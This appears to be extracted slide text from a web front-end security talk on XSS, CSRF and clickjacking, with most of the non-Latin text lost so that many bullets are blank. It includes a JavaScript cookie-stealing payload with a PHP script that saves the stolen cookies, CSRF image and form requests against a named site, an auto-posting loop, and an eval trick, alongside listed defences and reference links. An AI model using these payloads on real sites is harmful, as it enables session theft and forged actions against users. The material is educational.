2
3
4
•
    –
    –
    –
•
•
Cross-site scripting   XSS
XSS
•    Cookie
•    DOM
•
•…
Yupoo   XSS
alert
Javascript
var img = new Image();
img.src = 'get_cookie.php?var='+encodeURI(document.cookie);




               PHP
<?php
if (isset($_GET['var'])) {
    file_put_contents('./cookie/'.time().'.txt',
urldecode($_GET['var']));
}
“   ”
• Filter input,Escape output
•         Cookie
•              noscript?
•
•
• http://en.wikipedia.org/wiki/Cross-site_scripting
• http://www.gracecode.com/archives/2517
• http://www.gracecode.com/archives/2491
• http://ha.ckers.org/xss.html
• http://www.xssed.com/
CSRF Cross Site Request Forgery
<img src=“http://.../del.php?id=64” />
<form action="http://jiwai.de/wo/status/update"
  method="post">
    <textarea name="jw_status"></textarea>
    <input type="submit" />
 </form>
•
•   GET   POST

•
setInterval(function() {
    var img = new Image();
    var message = '       ';
    var api = 'http://jiwai.de/wo/status/
  update';
    img.src = api + '?jw_status=' + message +
                        '&t=' + +new Date();
}, 1000);
“   ”
•       GET POST    Cookie
•   Referer
•           Token
•
•   _tb_token_




•          Referer
• http://en.wikipedia.org/wiki/Cross-site_request_forgery
• http://www.cgisecurity.com/csrf-faq.html
• http://www.80sec.com/csrf-securit.html
• http://www.playhack.net/view.php?id=31
Twitter   Clickjacking
1.        iframe     Twitter
               0
2.           “   ”

3.
     Twitter
•
•
CSRF
Cookie Session
•   “JS   ”
•
•
Q&A
'alert(/tHx/)'.replace(/.+/, eval);

F2e security